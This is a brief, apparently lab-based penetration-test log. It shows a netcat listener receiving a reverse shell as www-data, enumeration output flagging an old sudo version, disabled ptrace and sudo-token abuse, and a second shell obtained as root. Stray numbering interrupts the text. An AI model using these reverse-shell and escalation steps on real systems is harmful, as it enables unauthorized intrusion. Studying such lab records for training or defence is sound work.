rlwrap nc -nvlp 80 listening on [any]80 ... connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190]60626 id uid=33(www-data) gid=33(www-data) groups=33(www-data) pwd
╔══════════╣ Sudo version ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version Sudo version 1.9.5p2
1 2 3
╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens ptrace protection is disabled (0), so sudo tokens could be abused
1 2 3
╔══════════╣ .sh files in path ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path /usr/bin/gettext.sh
rlwrap nc -nvlp 80 listening on [any] 80 ... connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190] 45784 id uid=0(root) gid=0(root) groups=0(root)